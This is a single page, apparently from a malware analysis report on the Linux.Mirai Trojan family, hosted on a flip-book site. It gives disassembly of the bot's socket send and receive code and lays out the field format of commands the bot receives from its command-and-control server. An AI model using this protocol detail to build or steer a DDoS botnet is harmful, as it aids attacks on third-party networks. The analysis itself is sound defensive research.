Investigation of Linux.Mirai Trojan family
u97CXm
u97CXm
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
20<br />
20<br />
.text:0804B7BE push ebx ; int<br />
.text:0804B7BF call ___libc_send<br />
.text:0804B7C4 mov dword ptr [esp+0], 3<br />
.text:0804B7CB call get_data_char<br />
.text:0804B7D0 mov ecx, ds:fd<br />
.text:0804B7D6 mov [esp+49Ch+var_15], al<br />
.text:0804B7DD push 4000h ; int<br />
.text:0804B7E2 push 1 ; int<br />
.text:0804B7E4 xor esi, esi<br />
.text:0804B7E6 lea eax, [esp+4A4h+var_15]<br />
.text:0804B7ED push eax ; char *<br />
.text:0804B7EE push ecx ; int<br />
.text:0804B7EF call ___libc_send<br />
Data from the C&C server is saved to the buffer. If more than one command is received during an iteration,<br />
they are handled one by one. The format <strong>of</strong> the received command (for number fields, network<br />
byte order is used) is as follows:<br />
Field Purpose Size<br />
fullLength<br />
sleepTime<br />
full length <strong>of</strong> the received command<br />
time for execution (every command<br />
runs a new process using fork and<br />
then kills it)<br />
2<br />
4<br />
cmd command number 1<br />
hostCount number <strong>of</strong> attacked hosts 1<br />
target[hostCount] target array 5*hostCount<br />
param_cnt quantity 1<br />
param[param_cnt] parameters ...<br />
If fullLength == 0, two zero bytes are sent to the C&C server:<br />
.text:0804B518 recv_ok:<br />
; CODE XREF: main<br />
+165j<br />
.text:0804B518 mov ax, [edi]<br />
.text:0804B51B ror ax, 8<br />
.text:0804B51F test ax, ax<br />
.text:0804B522 jnz short process_command<br />
.text:0804B524 mov eax, ds:fd